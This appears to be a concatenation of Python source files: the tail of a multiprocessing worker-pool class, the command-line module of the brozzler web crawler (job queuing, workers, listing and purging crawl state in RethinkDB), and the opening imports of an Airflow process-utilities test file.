def __init__(self, n_processes: int, maxtasksperchild: Optional[int], stderr: Sink):
self._n_processes = n_processes
self._maxtasksperchild = maxtasksperchild or None
self._given_stderr = stderr
self._stdin = None
self._stderr = None
self._stdout = None
def map(self, filter: Filter[Any, Any], items:Iterable[Any]) -> Iterable[Any]:
self._stdin = QueueIO(Queue(maxsize=self._n_processes))
self._stdout = QueueIO(Queue())
self._stderr = QueueIO(Queue())
# Without this multiprocessing.Queue() will output an ugly error message if a user ever hits ctrl-c.
# By setting _ignore_epipe we prevent Queue() from displaying its message and we show our own friendly
# message instead. In future versions of Python this could break but for now this works for 3.6-3.10.
self._stdin ._queue._ignore_epipe = True
self._stdout._queue._ignore_epipe = True
self._stderr._queue._ignore_epipe = True
self._threads = []
self._completed = False
self._terminate = False
self._pool: List[Process] = []
self._no_more_items = False
def maintain_pool():
finished = lambda: self._completed and (self._stdin._queue.qsize() == 0 or self._terminate)
while not finished():
if self._terminate:
break
self._pool = [p for p in self._pool if p.is_alive()]
for _ in range(self._n_processes-len(self._pool)):
args = (filter, self._stdin, self._stdout, self._stderr, self._maxtasksperchild)
process = Process(target=PipesPool.worker, args=args)
process.start()
self._pool.append(process)
#I don't like this but it seems to be
#the fastest/simplest way out of all my tests...
time.sleep(0.1)
if not self._terminate:
for _ in self._pool: self._stdin.write(None)
else:
for p in self._pool: p.terminate()
for p in self._pool: p.join()
self._stderr.write(None)
self._stdout.write(None)
def populate_tasks():
try:
for item in items:
if self._terminate: break
try:
self._stdin.write(pickle.dumps(item))
except Exception as e:
if "pickle" in str(e) or "Pickling" in str(e):
message = str(e) if isinstance(e,CobaException) else (
f"We attempted to process your code on multiple processes but were unable to do so due to a pickle "
f"error. The exact error received was '{str(e)}'. Errors this kind can often be fixed in one of two "
f"ways: 1) evaluate the experiment in question on a single process with no limit on the tasks per child "
f"or 2) modify the named class to be picklable. The easiest way to make a given class picklable is to "
f"add `def __reduce__(self): return (<the class in question>, (<tuple of constructor arguments>))` to "
f"the class. For more information see https://docs.python.org/3/library/pickle.html#object.__reduce__."
)
self._stderr.write(message)
# I'm not sure what I think about this...
# It means pipes stops after a pickle error...
# This is how it has worked for a long time
# So we're leaving it as is for now...
break
else: #pragma: no cover
self._stderr.write((time.time(), current_process().name, e, traceback.format_tb(e.__traceback__)))
except Exception as e:
self._stderr.write((time.time(), current_process().name, e, traceback.format_tb(e.__traceback__)))
self._completed = True
log_thread = Thread(target=Pipes.join(self._stderr, Foreach(self._given_stderr)).run)
log_thread.daemon = True
log_thread.start()
pool_thread = Thread(target=maintain_pool)
pool_thread.daemon = True
pool_thread.start()
tasks_thread = Thread(target=populate_tasks)
tasks_thread.daemon = True
tasks_thread.start()
self._threads.append(log_thread)
self._threads.append(pool_thread)
self._threads.append(tasks_thread)
for item in self._stdout.read():
yield item
def close(self):
while self._threads:
self._threads.pop().join()
if self._stdin : self._stdin._queue .close()
if self._stdout: self._stdout._queue.close()
if self._stderr: self._stderr._queue.close()
def terminate(self):
self._terminate = True
if len(self._threads) > 2:
self._threads[1].join()
@property
def is_terminated(self) -> bool:
return self._terminate
@staticmethod
def worker(filter: Filter[Any,Any], stdin: Source, stdout: Sink, stderr: Sink, maxtasksperchild: Optional[int]):
try:
for item in islice(map(pickle.loads,stdin.read()),maxtasksperchild):
result = filter.filter(item)
#This is a bit of a hack primarily put in place to deal with
#CobaMultiprocessing that performs coba logging of exceptions.
#An alternative solution would be to raise a coba exception
#full logging decorators in the exception message.
if result is None: continue
if inspect.isgenerator(result) or isinstance(result, collections.abc.Iterator):
stdout.write(list(result))
else:
stdout.write(result)
except Exception as e:
if str(e).startswith("Can't get attribute"):
message = (
"We attempted to evaluate your code in multiple processes but we were unable to find all the code "
"definitions needed to pass the tasks to the processes. The two most common causes of this error are: "
"1) a learner or simulation is defined in a Jupyter Notebook cell or 2) a necessary class definition "
"exists inside the `__name__=='__main__'` code block in the main execution script. In either case "
"you can choose one of two simple solutions: 1) evaluate your code in a single process with no limit "
"child tasks or 2) define all necessary classes in a separate file and include the classes via import "
"statements."
)
stderr.write(message)
else:
#WARNING: this will scrub e of its traceback which is why the traceback is also sent as a string
stderr.write((time.time(), current_process().name, e, traceback.format_tb(e.__traceback__)))
except KeyboardInterrupt:
#When ctrl-c is pressed on the keyboard KeyboardInterrupt is raised in each
#process. We need to handle this here because Processor is always run in a
#background process and receives this. We can ignore this because the exception will
#also be raised in our main process. Therefore we simply ignore and trust the main to
#handle the keyboard interrupt correctly.
pass
class Multiprocessor(Filter[Iterable[Any], Iterable[Any]]):
"""Create multiple processes to filter given items."""
def __init__(self,
filter: Filter[Any, Any],
n_processes: int = 1,
maxtasksperchild: int = 0,
stderr: Sink = ConsoleSink(),
chunked: bool = True) -> None:
"""Instantiate a Multiprocessor.
Args:
filter: The inner pipe that will be executed on multiple processes.
n_processes: The number of processes that should be created to filter items.
maxtasksperchild: The number of items a process should filter before being restarted.
stderr: The sink that all errors on background processes will be written to.
chunked: Indicates that the given items have been chunked. Setting this will flatten the return.
"""
self._filter = filter
self._n_processes = n_processes
self._maxtasksperchild = maxtasksperchild
self._stderr = stderr
self._chunked = chunked
def filter(self, items: Iterable[Any]) -> Iterable[Any]:
with PipesPool(self._n_processes, self._maxtasksperchild, self._stderr) as pool:
for item in pool.map(self._filter, items):
if self._chunked:
for inner_item in item:
yield inner_item
else:
yield item
@property
def params(self) -> Dict[str,Any]:
return self._filter.params
|
cli.py
|
#!/usr/bin/env python
'''
brozzler/cli.py - brozzler command line executables
Copyright (C) 2014-2019 Internet Archive
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import argparse
import brozzler
import brozzler.worker
import datetime
import json
import logging
import os
import re
import requests
import doublethink
import signal
import string
import sys
import threading
import time
import traceback
import warnings
import yaml
import shutil
import base64
import rethinkdb as r
def add_common_options(arg_parser, argv=None):
argv = argv or sys.argv
arg_parser.add_argument(
'-q', '--quiet', dest='log_level', action='store_const',
default=logging.INFO, const=logging.NOTICE, help='quiet logging')
arg_parser.add_argument(
'-v', '--verbose', dest='log_level', action='store_const',
default=logging.INFO, const=logging.DEBUG, help=(
'verbose logging'))
arg_parser.add_argument(
'--trace', dest='log_level', action='store_const',
default=logging.INFO, const=logging.TRACE, help=(
'very verbose logging'))
# arg_parser.add_argument(
# '-s', '--silent', dest='log_level', action='store_const',
# default=logging.INFO, const=logging.CRITICAL)
arg_parser.add_argument(
'--version', action='version',
version='brozzler %s - %s' % (
brozzler.__version__, os.path.basename(argv[0])))
def add_rethinkdb_options(arg_parser):
arg_parser.add_argument(
'--rethinkdb-servers', dest='rethinkdb_servers',
default=os.environ.get('BROZZLER_RETHINKDB_SERVERS', 'localhost'),
help=(
'rethinkdb servers, e.g. '
'db0.foo.org,db0.foo.org:38015,db1.foo.org (default is the '
'value of environment variable BROZZLER_RETHINKDB_SERVERS)'))
arg_parser.add_argument(
'--rethinkdb-db', dest='rethinkdb_db',
default=os.environ.get('BROZZLER_RETHINKDB_DB', 'brozzler'),
help=(
'rethinkdb database name (default is the value of environment '
'variable BROZZLER_RETHINKDB_DB)'))
def rethinker(args):
servers = args.rethinkdb_servers or 'localhost'
db = args.rethinkdb_db or os.environ.get(
'BROZZLER_RETHINKDB_DB') or 'brozzler'
return doublethink.Rethinker(servers.split(','), db)
def configure_logging(args):
logging.basicConfig(
stream=sys.stderr, level=args.log_level, format=(
'%(asctime)s %(process)d %(levelname)s %(threadName)s '
'%(name)s.%(funcName)s(%(filename)s:%(lineno)d) %(message)s'))
logging.getLogger('requests.packages.urllib3').setLevel(logging.WARN)
warnings.simplefilter(
'ignore', category=requests.packages.urllib3.exceptions.InsecureRequestWarning)
warnings.simplefilter(
'ignore', category=requests.packages.urllib3.exceptions.InsecurePlatformWarning)
def suggest_default_chrome_exe():
# mac os x application executable paths
for path in [
'/Applications/Chromium.app/Contents/MacOS/Chromium',
'/Applications/Google Chrome.app/Contents/MacOS/Google Chrome']:
if os.path.exists(path):
return path
# "chromium-browser" is the executable on ubuntu trusty
# https://github.com/internetarchive/brozzler/pull/6/files uses "chromium"
# google chrome executable names taken from these packages:
# http://www.ubuntuupdates.org/ppa/google_chrome
for exe in [
'chromium-browser', 'chromium', 'google-chrome',
'google-chrome-stable', 'google-chrome-beta',
'google-chrome-unstable']:
if shutil.which(exe):
return exe
return 'chromium-browser'
class BetterArgumentDefaultsHelpFormatter(
argparse.ArgumentDefaultsHelpFormatter):
'''
Like argparse.ArgumentDefaultsHelpFormatter but omits the default value
for arguments with action='store_const'.
'''
def _get_help_string(self, action):
if isinstance(action, argparse._StoreConstAction):
return action.help
else:
return super()._get_help_string(action)
def brozzle_page(argv=None):
'''
Command line utility entry point for brozzling a single page. Opens url in
a browser, running some javascript behaviors, and prints outlinks.
'''
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
description='brozzle-page - brozzle a single page',
formatter_class=BetterArgumentDefaultsHelpFormatter)
arg_parser.add_argument('url', metavar='URL', help='page url')
arg_parser.add_argument(
'-e', '--chrome-exe', dest='chrome_exe',
default=suggest_default_chrome_exe(),
help='executable to use to invoke chrome')
arg_parser.add_argument(
'--behavior-parameters', dest='behavior_parameters',
default=None, help=(
'json blob of parameters to populate the javascript behavior '
'template, e.g. {"parameter_username":"x",'
'"parameter_password":"y"}'))
arg_parser.add_argument(
'--username', dest='username', default=None,
help='use this username to try to log in if a login form is found')
arg_parser.add_argument(
'--password', dest='password', default=None,
help='use this password to try to log in if a login form is found')
arg_parser.add_argument(
'--proxy', dest='proxy', default=None, help='http proxy')
arg_parser.add_argument(
'--screenshot-full-page', dest='screenshot_full_page',
action='store_true')
arg_parser.add_argument(
'--skip-extract-outlinks', dest='skip_extract_outlinks',
action='store_true')
arg_parser.add_argument(
'--skip-visit-hashtags', dest='skip_visit_hashtags',
action='store_true')
arg_parser.add_argument(
'--skip-youtube-dl', dest='skip_youtube_dl', action='store_true')
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
brozzler.chrome.check_version(args.chrome_exe)
behavior_parameters = {}
if args.behavior_parameters:
behavior_parameters = json.loads(args.behavior_parameters)
site = brozzler.Site(None, {
'id': -1, 'seed': args.url, 'behavior_parameters': behavior_parameters,
'username': args.username, 'password': args.password})
page = brozzler.Page(None, {'url': args.url, 'site_id': site.id})
worker = brozzler.BrozzlerWorker(
frontier=None, proxy=args.proxy,
skip_extract_outlinks=args.skip_extract_outlinks,
skip_visit_hashtags=args.skip_visit_hashtags,
skip_youtube_dl=args.skip_youtube_dl,
screenshot_full_page=args.screenshot_full_page)
def on_screenshot(screenshot_jpeg):
OK_CHARS = string.ascii_letters + string.digits
filename = '/tmp/{}-{:%Y%m%d%H%M%S}.jpg'.format(
''.join(ch if ch in OK_CHARS else '_' for ch in args.url),
datetime.datetime.now())
with open(filename, 'wb') as f:
f.write(screenshot_jpeg)
logging.info('wrote screenshot to %s', filename)
browser = brozzler.Browser(chrome_exe=args.chrome_exe)
try:
browser.start(proxy=args.proxy)
outlinks = worker.brozzle_page(
browser, site, page, on_screenshot=on_screenshot,
enable_youtube_dl=not args.skip_youtube_dl)
logging.info('outlinks: \n\t%s', '\n\t'.join(sorted(outlinks)))
except brozzler.ReachedLimit as e:
logging.error('reached limit %s', e)
except brozzler.PageInterstitialShown as e:
logging.error('page interstitial shown %s', e)
finally:
browser.stop()
def brozzler_new_job(argv=None):
'''
Command line utility entry point for queuing a new brozzler job. Takes a
yaml brozzler job configuration file, creates job, sites, and pages objects
in rethinkdb, which brozzler-workers will look at and start crawling.
'''
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
description='brozzler-new-job - queue new job with brozzler',
formatter_class=BetterArgumentDefaultsHelpFormatter)
arg_parser.add_argument(
'job_conf_file', metavar='JOB_CONF_FILE',
help='brozzler job configuration file in yaml')
add_rethinkdb_options(arg_parser)
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
frontier = brozzler.RethinkDbFrontier(rr)
try:
brozzler.new_job_file(frontier, args.job_conf_file)
except brozzler.InvalidJobConf as e:
print('brozzler-new-job: invalid job file:', args.job_conf_file, file=sys.stderr)
print(' ' + yaml.dump(e.errors).rstrip().replace('\n', '\n '), file=sys.stderr)
sys.exit(1)
def brozzler_new_site(argv=None):
'''
Command line utility entry point for queuing a new brozzler site.
Takes a seed url and creates a site and page object in rethinkdb, which
brozzler-workers will look at and start crawling.
'''
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
description='brozzler-new-site - register site to brozzle',
formatter_class=BetterArgumentDefaultsHelpFormatter)
arg_parser.add_argument('seed', metavar='SEED', help='seed url')
add_rethinkdb_options(arg_parser)
arg_parser.add_argument(
'--time-limit', dest='time_limit', default=None,
help='time limit in seconds for this site')
arg_parser.add_argument(
'--ignore-robots', dest='ignore_robots', action='store_true',
help='ignore robots.txt for this site')
arg_parser.add_argument(
'--warcprox-meta', dest='warcprox_meta',
help=(
'Warcprox-Meta http request header to send with each request; '
'must be a json blob, ignored unless warcprox features are '
'enabled'))
arg_parser.add_argument(
'--behavior-parameters', dest='behavior_parameters',
default=None, help=(
'json blob of parameters to populate the javascript behavior '
'template, e.g. {"parameter_username":"x",'
'"parameter_password":"y"}'))
arg_parser.add_argument(
'--username', dest='username', default=None,
help='use this username to try to log in if a login form is found')
arg_parser.add_argument(
'--password', dest='password', default=None,
help='use this password to try to log in if a login form is found')
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
site = brozzler.Site(rr, {
'seed': args.seed,
'time_limit': int(args.time_limit) if args.time_limit else None,
'ignore_robots': args.ignore_robots,
'warcprox_meta': json.loads(
args.warcprox_meta) if args.warcprox_meta else None,
'behavior_parameters': json.loads(
args.behavior_parameters) if args.behavior_parameters else None,
'username': args.username,
'password': args.password})
frontier = brozzler.RethinkDbFrontier(rr)
brozzler.new_site(frontier, site)
def brozzler_worker(argv=None):
'''
Main entry point for brozzler, gets sites and pages to brozzle from
rethinkdb, brozzles them.
'''
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
formatter_class=BetterArgumentDefaultsHelpFormatter)
add_rethinkdb_options(arg_parser)
arg_parser.add_argument(
'-e', '--chrome-exe', dest='chrome_exe',
default=suggest_default_chrome_exe(),
help='executable to use to invoke chrome')
arg_parser.add_argument(
'-n', '--max-browsers', dest='max_browsers', default='1',
help='max number of chrome instances simultaneously browsing pages')
arg_parser.add_argument(
'--proxy', dest='proxy', default=None, help='http proxy')
arg_parser.add_argument(
'--warcprox-auto', dest='warcprox_auto', action='store_true',
help=(
'when needed, choose an available instance of warcprox from '
'the rethinkdb service registry'))
arg_parser.add_argument(
'--skip-extract-outlinks', dest='skip_extract_outlinks',
action='store_true', help=argparse.SUPPRESS)
arg_parser.add_argument(
'--skip-visit-hashtags', dest='skip_visit_hashtags',
action='store_true', help=argparse.SUPPRESS)
arg_parser.add_argument(
'--skip-youtube-dl', dest='skip_youtube_dl',
action='store_true', help=argparse.SUPPRESS)
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
brozzler.chrome.check_version(args.chrome_exe)
def dump_state(signum, frame):
signal.signal(signal.SIGQUIT, signal.SIG_IGN)
try:
state_strs = []
frames = sys._current_frames()
threads = {th.ident: th for th in threading.enumerate()}
for ident in frames:
if threads[ident]:
state_strs.append(str(threads[ident]))
else:
state_strs.append('<???:thread:ident=%s>' % ident)
stack = traceback.format_stack(frames[ident])
state_strs.append(''.join(stack))
logging.info(
'dumping state (caught signal %s)\n%s' % (
signum, '\n'.join(state_strs)))
except BaseException as e:
logging.error('exception dumping state: %s' % e)
finally:
signal.signal(signal.SIGQUIT, dump_state)
rr = rethinker(args)
frontier = brozzler.RethinkDbFrontier(rr)
service_registry = doublethink.ServiceRegistry(rr)
worker = brozzler.worker.BrozzlerWorker(
frontier, service_registry, max_browsers=int(args.max_browsers),
chrome_exe=args.chrome_exe, proxy=args.proxy,
warcprox_auto=args.warcprox_auto,
skip_extract_outlinks=args.skip_extract_outlinks,
skip_visit_hashtags=args.skip_visit_hashtags,
skip_youtube_dl=args.skip_youtube_dl)
signal.signal(signal.SIGQUIT, dump_state)
signal.signal(signal.SIGTERM, lambda s,f: worker.stop())
signal.signal(signal.SIGINT, lambda s,f: worker.stop())
th = threading.Thread(target=worker.run, name='BrozzlerWorkerThread')
th.start()
th.join()
logging.info('brozzler-worker is all done, exiting')
def brozzler_ensure_tables(argv=None):
'''
Creates rethinkdb tables if they don't already exist. Brozzler
(brozzler-worker, brozzler-new-job, etc) normally creates the tables it
needs on demand at startup, but if multiple instances are starting up at
the same time, you can end up with duplicate broken tables. So it's a good
idea to use this utility at an early step when spinning up a cluster.
'''
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
formatter_class=BetterArgumentDefaultsHelpFormatter)
add_rethinkdb_options(arg_parser)
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
# services table
doublethink.ServiceRegistry(rr)
# sites, pages, jobs tables
brozzler.frontier.RethinkDbFrontier(rr)
class Jsonner(json.JSONEncoder):
def default(self, o):
if isinstance(o, datetime.datetime):
return o.isoformat()
elif isinstance(o, bytes):
return base64.b64encode(o).decode('ascii')
else:
return json.JSONEncoder.default(self, o)
def brozzler_list_jobs(argv=None):
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
formatter_class=BetterArgumentDefaultsHelpFormatter)
arg_parser.add_argument(
'--yaml', dest='yaml', action='store_true', help=(
'yaml output (default is json)'))
group = arg_parser.add_mutually_exclusive_group(required=True)
group.add_argument(
'--active', dest='active', action='store_true', help=(
'list active jobs'))
group.add_argument(
'--all', dest='all', action='store_true', help=(
'list all jobs'))
group.add_argument(
'--job', dest='job', metavar='JOB_ID', help=(
'list only the specified job'))
add_rethinkdb_options(arg_parser)
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
if args.job is not None:
try:
job_id = int(args.job)
except ValueError:
job_id = args.job
reql = rr.table('jobs').get(job_id)
logging.debug('querying rethinkdb: %s', reql)
result = reql.run()
if result:
results = [reql.run()]
else:
logging.error('no such job with id %r', job_id)
sys.exit(1)
else:
reql = rr.table('jobs').order_by('id')
if args.active:
reql = reql.filter({'status': 'ACTIVE'})
logging.debug('querying rethinkdb: %s', reql)
results = reql.run()
if args.yaml:
yaml.dump_all(
results, stream=sys.stdout, explicit_start=True,
default_flow_style=False)
else:
for result in results:
print(json.dumps(result, cls=Jsonner, indent=2))
def brozzler_list_sites(argv=None):
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
formatter_class=BetterArgumentDefaultsHelpFormatter)
arg_parser.add_argument(
'--yaml', dest='yaml', action='store_true', help=(
'yaml output (default is json)'))
group = arg_parser.add_mutually_exclusive_group(required=True)
group.add_argument(
'--active', dest='active', action='store_true', help=(
'list all active sites'))
group.add_argument(
'--job', dest='job', metavar='JOB_ID', help=(
'list sites for a particular job'))
group.add_argument(
'--jobless', dest='jobless', action='store_true', help=(
'list all jobless sites'))
group.add_argument(
'--site', dest='site', metavar='SITE_ID', help=(
'list only the specified site'))
group.add_argument(
'--all', dest='all', action='store_true', help=(
'list all sites'))
add_rethinkdb_options(arg_parser)
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
reql = rr.table('sites')
if args.job:
try:
job_id = int(args.job)
except ValueError:
job_id = args.job
reql = reql.get_all(job_id, index='job_id')
elif args.jobless:
reql = reql.filter(~r.row.has_fields('job_id'))
elif args.active:
reql = reql.between(
['ACTIVE', r.minval], ['ACTIVE', r.maxval],
index='sites_last_disclaimed')
elif args.site:
reql = reql.get_all(args.site)
logging.debug('querying rethinkdb: %s', reql)
results = reql.run()
if args.yaml:
yaml.dump_all(
results, stream=sys.stdout, explicit_start=True,
default_flow_style=False)
else:
for result in results:
print(json.dumps(result, cls=Jsonner, indent=2))
def brozzler_list_pages(argv=None):
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
formatter_class=BetterArgumentDefaultsHelpFormatter)
arg_parser.add_argument(
'--yaml', dest='yaml', action='store_true', help=(
'yaml output (default is json)'))
group = arg_parser.add_mutually_exclusive_group(required=True)
group.add_argument(
'--job', dest='job', metavar='JOB_ID', help=(
'list pages for all sites of a particular job'))
group.add_argument(
'--site', dest='site', metavar='SITE_ID', help=(
'list pages for the specified site'))
# group.add_argument(
# '--page', dest='page', metavar='PAGE_ID', help=(
# 'list only the specified page'))
group = arg_parser.add_mutually_exclusive_group()
group.add_argument(
'--queued', dest='queued', action='store_true', help=(
'limit to queued pages'))
group.add_argument(
'--brozzled', dest='brozzled', action='store_true', help=(
'limit to pages that have already been brozzled'))
group.add_argument(
'--claimed', dest='claimed', action='store_true', help=(
'limit to pages that are currently claimed by a brozzler '
'worker'))
add_rethinkdb_options(arg_parser)
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
if args.job:
try:
job_id = int(args.job)
except ValueError:
job_id = args.job
reql = rr.table('sites').get_all(job_id, index='job_id')['id']
logging.debug('querying rethinkb: %s', reql)
site_ids = reql.run()
elif args.site:
try:
site_ids = [int(args.site)]
except ValueError:
site_ids = [args.site]
for site_id in site_ids:
reql = rr.table('pages')
if args.queued:
reql = reql.between(
[site_id, 0, r.minval], [site_id, 0, r.maxval],
index='least_hops')
elif args.brozzled:
reql = reql.between(
[site_id, 1, r.minval], [site_id, r.maxval, r.maxval],
index='least_hops')
else:
reql = reql.between(
[site_id, 0, r.minval], [site_id, r.maxval, r.maxval],
index='least_hops')
reql = reql.order_by(index="least_hops")
if args.claimed:
reql = reql.filter({'claimed': True})
logging.debug('querying rethinkb: %s', reql)
results = reql.run()
if args.yaml:
yaml.dump_all(
results, stream=sys.stdout, explicit_start=True,
default_flow_style=False)
else:
for result in results:
print(json.dumps(result, cls=Jsonner, indent=2))
def brozzler_purge(argv=None):
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
description='brozzler-purge - purge crawl state from rethinkdb',
formatter_class=BetterArgumentDefaultsHelpFormatter)
group = arg_parser.add_mutually_exclusive_group(required=True)
group.add_argument(
'--job', dest='job', metavar='JOB_ID', help=(
'purge crawl state from rethinkdb for a job, including all '
'sites and pages'))
group.add_argument(
'--site', dest='site', metavar='SITE_ID', help=(
'purge crawl state from rethinkdb for a site, including all '
'pages'))
group.add_argument(
'--finished-before', dest='finished_before', metavar='YYYY-MM-DD',
help=('purge crawl state from rethinkdb for a jobs that ended '
'before this date'))
arg_parser.add_argument(
'--force', dest='force', action='store_true', help=(
'purge even if job or site is still has status ACTIVE'))
add_rethinkdb_options(arg_parser)
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
frontier = brozzler.RethinkDbFrontier(rr)
if args.job:
try:
job_id = int(args.job)
except ValueError:
job_id = args.job
job = brozzler.Job.load(rr, job_id)
if not job:
logging.fatal('no such job %r', job_id)
sys.exit(1)
if job.status == 'ACTIVE':
if args.force:
logging.warning(
'job %s has status ACTIVE, purging anyway because '
'--force was supplied', job_id)
else:
logging.fatal(
'refusing to purge job %s because status is ACTIVE '
'(override with --force)', job_id)
sys.exit(1)
_purge_job(rr, job_id)
elif args.site:
site_id = args.site
site = brozzler.Site.load(rr, site_id)
if not site:
logging.fatal('no such job %r', job_id)
sys.exit(1)
if site.status == 'ACTIVE':
if args.force:
logging.warning(
'site %s has status ACTIVE, purging anyway because '
'--force was supplied', site_id)
else:
logging.fatal(
'refusing to purge site %s because status is ACTIVE '
'(override with --force)', site_id)
sys.exit(1)
_purge_site(rr, site_id)
elif args.finished_before:
finished_before = datetime.datetime.strptime(
args.finished_before, '%Y-%m-%d').replace(
tzinfo=doublethink.UTC)
reql = rr.table('jobs').filter(
r.row['finished'].default(r.maxval).lt(finished_before).or_(
r.row['starts_and_stops'].nth(-1)['stop'].default(r.maxval).lt(finished_before)))
logging.debug(
'retrieving jobs older than %s: %s', finished_before, reql)
for job in reql.run():
# logging.info('job %s finished=%s starts_and_stops[-1]["stop"]=%s',
# job['id'], job.get('finished'),
# job.get('starts_and_stops', [{'stop':None}])[-1]['stop'])
_purge_job(rr, job['id'])
def _purge_site(rr, site_id):
reql = rr.table('pages').between(
[site_id, r.minval, r.minval],
[site_id, r.maxval, r.maxval],
index='priority_by_site').delete()
logging.debug('purging pages for site %s: %s', site_id, reql)
result = reql.run()
logging.info('purged pages for site %s: %s', site_id, result)
reql = rr.table('sites').get(site_id).delete()
logging.debug('purging site %s: %s', site_id, reql)
result = reql.run()
logging.info('purged site %s: %s', site_id, result)
def _purge_job(rr, job_id):
reql = rr.table('sites').get_all(job_id, index='job_id').get_field('id')
logging.debug('querying rethinkdb: %s', reql)
site_ids = list(reql.run())
for site_id in site_ids:
_purge_site(rr, site_id)
reql = rr.table('jobs').get(job_id).delete()
logging.debug('purging job %s: %s', job_id, reql)
result = reql.run()
logging.info('purged job %s: %s', job_id, result)
def brozzler_list_captures(argv=None):
'''
Handy utility for looking up entries in the rethinkdb "captures" table by
url or sha1.
'''
import urlcanon
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
formatter_class=BetterArgumentDefaultsHelpFormatter)
arg_parser.add_argument(
'-p', '--prefix', dest='prefix', action='store_true', help=(
'use prefix match for url (n.b. may not work as expected if '
'searching key has query string because canonicalization can '
'reorder query parameters)'))
arg_parser.add_argument(
'--yaml', dest='yaml', action='store_true', help=(
'yaml output (default is json)'))
add_rethinkdb_options(arg_parser)
add_common_options(arg_parser, argv)
arg_parser.add_argument(
'url_or_sha1', metavar='URL_or_SHA1',
help='url or sha1 to look up in captures table')
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
if args.url_or_sha1[:5] == 'sha1:':
if args.prefix:
logging.warning(
'ignoring supplied --prefix option which does not apply '
'to lookup by sha1')
# assumes it's already base32 (XXX could detect if hex and convert)
sha1base32 = args.url_or_sha1[5:].upper()
reql = rr.table('captures').between(
[sha1base32, r.minval, r.minval],
[sha1base32, r.maxval, r.maxval],
index='sha1_warc_type')
logging.debug('querying rethinkdb: %s', reql)
results = reql.run()
else:
key = urlcanon.semantic(args.url_or_sha1).surt().decode('ascii')
abbr_start_key = key[:150]
if args.prefix:
# surt is necessarily ascii and \x7f is the last ascii character
abbr_end_key = key[:150] + '\x7f'
end_key = key + '\x7f'
else:
abbr_end_key = key[:150]
end_key = key
reql = rr.table('captures').between(
[abbr_start_key, r.minval],
[abbr_end_key, r.maxval],
index='abbr_canon_surt_timestamp', right_bound='closed')
reql = reql.order_by(index='abbr_canon_surt_timestamp')
reql = reql.filter(
lambda capture: (capture['canon_surt'] >= key)
& (capture['canon_surt'] <= end_key))
logging.debug('querying rethinkdb: %s', reql)
results = reql.run()
if args.yaml:
yaml.dump_all(
results, stream=sys.stdout, explicit_start=True,
default_flow_style=False)
else:
for result in results:
print(json.dumps(result, cls=Jsonner, indent=2))
def brozzler_stop_crawl(argv=None):
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
formatter_class=BetterArgumentDefaultsHelpFormatter)
group = arg_parser.add_mutually_exclusive_group(required=True)
add_rethinkdb_options(arg_parser)
group.add_argument(
'--job', dest='job_id', metavar='JOB_ID', help=(
'request crawl stop for the specified job'))
group.add_argument(
'--site', dest='site_id', metavar='SITE_ID', help=(
'request crawl stop for the specified site'))
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
if args.job_id:
try:
job_id = int(args.job_id)
except ValueError:
job_id = args.job_id
job = brozzler.Job.load(rr, job_id)
if not job:
logging.fatal('job not found with id=%r', job_id)
sys.exit(1)
job.stop_requested = doublethink.utcnow()
job.save()
elif args.site_id:
try:
site_id = int(args.site_id)
except ValueError:
site_id = args.site_id
site = brozzler.Site.load(rr, site_id)
if not site:
logging.fatal('site not found with id=%r', site_id)
sys.exit(1)
site.stop_requested = doublethink.utcnow()
site.save()
|
test_process_utils.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import subprocess
import time
import unittest
from contextlib import suppress
from subprocess import CalledProcessError
from tempfile import NamedTemporaryFile
from time import sleep
from unittest import mock
import psutil
import pytest
from airflow.exceptions import AirflowException
from airflow.utils import process_utils
